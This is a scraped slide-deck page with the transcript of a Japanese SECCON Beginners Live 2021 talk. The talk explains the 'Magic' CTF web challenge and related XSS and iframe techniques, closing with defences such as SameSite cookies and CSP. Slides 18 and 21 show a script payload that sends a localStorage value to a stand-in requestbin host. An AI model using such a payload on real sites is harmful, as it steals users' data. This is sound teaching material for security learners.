Save 37% off PRO during our Black Friday Sale! »

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

C0ed34c2bad05c45fbf4ed4d3e73d70b?s=47 Hi120ki
October 17, 2021
Technology
0
510

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/

C0ed34c2bad05c45fbf4ed4d3e73d70b?s=128

Hi120ki

October 17, 2021
Tweet

More Decks by Hi120ki

See All by Hi120ki
C0ed34c2bad05c45fbf4ed4d3e73d70b?s=48 hi120ki
2
700

Other Decks in Technology

See All in Technology
5ad40ebf0de566a519067153e6e85a41?s=48 nkajihara
0
130
140494d272a4d89883a94fdfdb29dea2?s=48 oracle4engineer
PRO
5
440
5d9cd19df0e91caac118b793b4f803d5?s=48 takefumiyoshii
30
9.1k
74cec195bfb6cb5165256d88cb7fcf0f?s=48 miu_crescent
2
160
88b514e6413838c0d0cfb3257cefd19d?s=48 kamata_shingo
3
570
665dd8a044d0e509e730a20ba9612d37?s=48 alexdaubois
1
140
C825832c4fc71ffdfd44905729281fb0?s=48 puhitaku
0
2.7k
966e29b84ae7dbde170f66b0bc75b7a6?s=48 ishiayaya
0
990
73c9d1065e0075a9da6e404e08fe77fb?s=48 siroitori0413
0
140
D1b28ca276bee52e56ba11785f70d2d6?s=48 makocchi
2
210
C422cc033079e005fd1aa1b845b099da?s=48 meow_noisy
0
380
B1dca90d4b3ffd2ccd918774e1ba170d?s=48 hmatsu47
PRO
0
1.9k

Featured

See All Featured
C4de88ea47538e4594750e3861a341c8?s=48 brettharned
96
3.7k
D83926c323d4f9289f947b4b4e76b939?s=48 jensimmons
210
11k
C620790ae5bf5b50c245b2e0ef95f338?s=48 deanohume
294
28k
B6a8f005f39d23ffc930508ac9da68b9?s=48 vanstee
123
5.2k
3d4519fd34b76fb265fc0237f3792bd4?s=48 danielanewman
6
790
11c84dff30266b907714802088852677?s=48 jasonvnalue
88
8.4k
5b6a2bd86ef643786a381a212e0ef2f1?s=48 geoffreycrofte
44
3.4k
8ec1383b240b5ba15ffb9743fceb3c0e?s=48 philnash
23
1.2k
1b75d89772b7eea1f6c89fbf362607d9?s=48 moore
129
22k
F29327647a9cff5c69618bae420792ea?s=48 tenderlove
58
3.9k
D67fff74178013024d833b3eec6cf27f?s=48 lynnandtonic
277
17k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
688
180k

Transcript

  1. Magic Web SECCON Beginners Live 2021 hi120ki

  2. @hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :

    firmware Web : json, magic

  3. Web Magic 3

  4. Magic [Web Hard] : 31solve Web 5 • • 4

  5. 5 /

  6. 6 /

  7. 7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  8. 8 / URL

  9. 9 /

  10. 10 crawler/index.js puppeteer Node.js Chrome URL

  11. 11 2. FLAG 3. URL crawler/index.js 1.

  12. 12 FLAG nginx/html/static/index.js FLAG

  13. 13 FLAG JavaScript XSS( )

  14. XSS 14 HTML Web HTML JavaScript Cookie Web

  15. 15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG

  16. 16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>

  17. 17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????

  18. 18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL

  19. XSS 19 magic/views/index.ejs <script> </script>

  20. 20 alert(1)

  21. 21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>

  22. 22 FLAG URL

  23. 23 XSS https://magic.quals.beginners.seccon.jp/

  24. 24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS

  25. 25 ... + = ? XSS

  26. 26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG

  27. 27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  28. 28 URL

  29. 29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS

  30. 30 FLAG 1. FLAG 2. 3.

  31. 31

  32. 1. XSS 2. 3. 32

  33. 1. XSS 2. 3. 33 FLAG

  34. 1. XSS 2. 3. 34

  35. 1. XSS 2. 3. 35

  36. 36 FLAG

  37. XSS • • Byte Bandits CTF 2020 Notes App •

    https://github.com/ByteBandits/bbctf-2020 37

  38. Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •

    FLAG iframe • • API

  39. iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL

    iframe

  40. iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe

  41. iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS

    FLAG

  42. iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)

    <script>...</script>

  43. 43 iframe SameSite Cookie None Lax

  44. 44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)

    FLAG

  45. 45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)

    FLAG

  46. SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie

    (session=nj49gn...) ✕ FLAG <script>...</script>

  47. 47 SameSite Cookie=None iframe CTF

  48. 48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (

    XSS Content-Security-Policy )

  49. 49 FLAG +

  50. 50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup

    https://hi120ki.github.io/blog/posts/20210523-3/